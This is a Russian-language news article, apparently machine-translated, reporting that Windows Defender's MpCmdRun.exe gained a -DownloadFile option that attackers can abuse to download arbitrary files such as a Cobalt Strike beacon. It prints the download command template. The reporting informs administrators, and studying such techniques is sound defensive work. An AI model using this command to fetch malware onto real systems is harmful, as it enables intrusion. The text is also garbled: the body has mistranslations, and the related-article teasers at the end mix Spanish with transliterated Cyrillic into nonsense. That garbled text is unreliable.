Защитник Windows превратился в опасное приложение для администраторов

  • Окна Защитник в Окна 10 - отличный инструмент для защиты вашей системы, но новое обновление превратило его в угрозу.
  • Новый файл загрузки команда может использоваться для загрузки любого внешнего файла, включая вредоносное ПО, на ваш компьютер.
  • Ознакомьтесь с нашими Раздел программного обеспечения лучшие статьи о новейших цифровых инструментах.
  • Если вас интересуют последние статьи о Windows 10, посетите наш всеобъемлющий Концентратор Windows 10.
Защитник Windows превращается в LOLBIN

Защитник Windows в Windows 10 - это первая линия защиты в случае атак вредоносного ПО, и он тоже довольно хорошая работа.

Однако в одном из своих новых обновлений могучий антивирус получил новую команду DownloadFile, которая позволит любому загружать любой файл с URL-адреса по определенному пути на вашем компьютере.

Мы можем назвать это эксплойтом, поскольку он также может использоваться даже для загрузки вредоносных программ, что было обнаружено исследователем безопасности Мохаммадом Аскаром, который опубликовал его находка в Твиттере.

Как можно использовать Защитник Windows для загрузки вредоносных программ?

Очень просто использовать служебную программу командной строки службы Microsoft Antimalware (MpCmdRun.exe) для загрузки любого файла из внешнего источника на ваш компьютер.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

В своей попытке Аскар смог загрузить Cobalt Strike beacon, известный инструмент злоумышленников, используя эту командную строку.

Новая команда включена в версию 4.18.2007.8-0 и выше, что дает неплохой стартовый момент для нападающих.

По сути, эта функция превращается Защитник Windows в LOLBIN (живущие в автономных двоичных файлах), безобидный системный файл, который можно использовать в злонамеренных целях.

К счастью, после загрузки вредоносного файла он будет обнаружен тем же Защитником Windows или другим программа-антивирус если представить.

Из надежной программы защиты Защитник Windows превратился в еще одну возможную угрозу, за которой придется пристально следить администраторам и экспертам по безопасности.

Если у вас есть предложения или комментарии, оставьте их ниже в разделе комментариев.

4 решения для Chrome-error://chromewebdata/

4 решения для Chrome-error://chromewebdata/Разное

Chrome-ошибка://chromewebdata/ suele afectar a las aplicaciones web, pero hay una forma de solucionarlo. Уна форма де solucionar Эсте проблема эс ajustar су código у verificar си тодо ЭСТА ан Орден...

Читать далее
Комо Вер Катар против Эквадора бесплатно [FIFA 2022]

Комо Вер Катар против Эквадора бесплатно [FIFA 2022]Разное

La Copa Mundial más esperada está a punto de comenzar y el partido inaugural es entre Catar y Ecuador.Los aficionados аль-футбол-де-тодо-эль-мундо quieren ver лос-партидос, pero не todos tienen acc...

Читать далее
Тайм-аут сторожевого таймера Win32k Power Watch: исправление ошибки в течение 7 месяцев

Тайм-аут сторожевого таймера Win32k Power Watch: исправление ошибки в течение 7 месяцевРазное

Код параметра Win32k power watchdog timeout является ошибкой BSOD и вызван дефектом управления. Пункт corregir Эсте ошибка, deberá buscar у eliminar лас aplicaciones де terceros Problemáticas. Siga...

Читать далее